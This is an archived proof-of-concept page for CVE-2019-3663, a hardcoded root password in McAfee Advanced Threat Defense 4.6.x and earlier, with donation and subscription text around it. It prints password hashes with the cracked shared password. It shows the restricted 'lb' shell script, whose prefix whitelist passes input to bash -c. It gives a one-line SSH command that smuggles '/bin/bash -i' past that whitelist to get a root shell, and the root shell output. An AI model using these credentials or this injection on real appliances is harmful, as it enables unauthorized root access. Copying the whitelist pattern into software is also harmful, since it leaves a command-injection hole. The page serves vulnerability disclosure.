Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-3663 PoC — Advanced Threat Defense (ATD) - Unprotected storage of shared credentials vulnerability

Source
https://github.com/funoverip/mcafee_atd_CVE-2019-3663
Associated Vulnerability
Title:Advanced Threat Defense (ATD) - Unprotected storage of shared credentials vulnerability (CVE-2019-3663)
Description:Unprotected Storage of Credentials vulnerability in McAfee Advanced Threat Defense (ATD) prior to 4.8 allows local attacker to gain access to the root password via accessing sensitive files on the system. This was originally published with a CVSS rating of High, further investigation has resulted in this being updated to Critical. The root password is common across all instances of ATD prior to 4.8. See the Security bulletin for further details
Description
 McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password
Readme
# McAfee ATD CVE-2019-3663
* McAfee Advanced Threat Defense ATD 4.6.x and earlier - Hardcoded root password
* Security Bulletin: https://kc.mcafee.com/corporate/index?page=content&id=SB10304

## Interesting shadow entries
```
root:$6$hHb7yjP/$JY9Zf8jFCL966X8rbOqerkuXR86AUMl4bNCuDiEgoXWZEE5dWssWvnokv.54YG4/KRQuNbZBiUWur2/Tj4uUf0:18030:0:99999:7:::
lb:$6$.ewB2mx1KaJArlbX$Bk8y21qhRblgJrlPW68712YqlS/kII6iVxLw849NK/6PAVYLHto1btfL4s.2WVpMNh1tXIwzr/h
```

## Interesting passwd entries
```
root:x:0:0:root:/root:/sbin/nologin
lb:x:0:0::/home/lb:/opt/amas/bin/lb_shell
```

## Cracked hashes
```
$6$hHb7yjP/$JY9Zf8jFCL966X8rbOqerkuXR86AUMl4bNCuDiEgoXWZEE5dWssWvnokv.54YG4/KRQuNbZBiUWur2/Tj4uUf0:validedge
$6$.ewB2mx1KaJArlbX$Bk8y21qhRblgJrlPW68712YqlS/kII6iVxLw849NK/6PAVYLHto1btfL4s.2WVpMNh1tXIwzr/h4WIY60R1xe.:validedge
```

## Custom shell of 'lb' user
```
$ cat /opt/amas/bin/lb_shell
#!/bin/bash
# We accept exactly 2 args and in the form:
# -c <command>
if (( $# != 2 )) || [[ "$1" != "-c" ]] ; then
  echo interactive login not permitted
  exit 1
fi
case "$2" in
  # Accept only scp and fileupload commands
  "scp "* | "php /srv/www/htdocs/php/fileupload.php "* | "mv /vedata/"* | "cd /srv/www/htdocs/php/"* | "sleep"* | *"collectPerformanceData.sh "*)
  ;; # continue execution
   * )
   echo that command is not allowed
   exit 1
   ;;
esac
# Execute the command
/bin/bash -c "$2"
# Return with the exit status of the command
exit $?
```

# PoC
```
$ ssh -p 2222 lb@b.b.c.d "sleep 1;/bin/bash -i "
[root@mcafee ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@mcafee ~]#
```
File Snapshot

 [4.0K]  /data/pocs/ae3ced3f75650abe20943eb691aa511e849521e8
└── [1.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →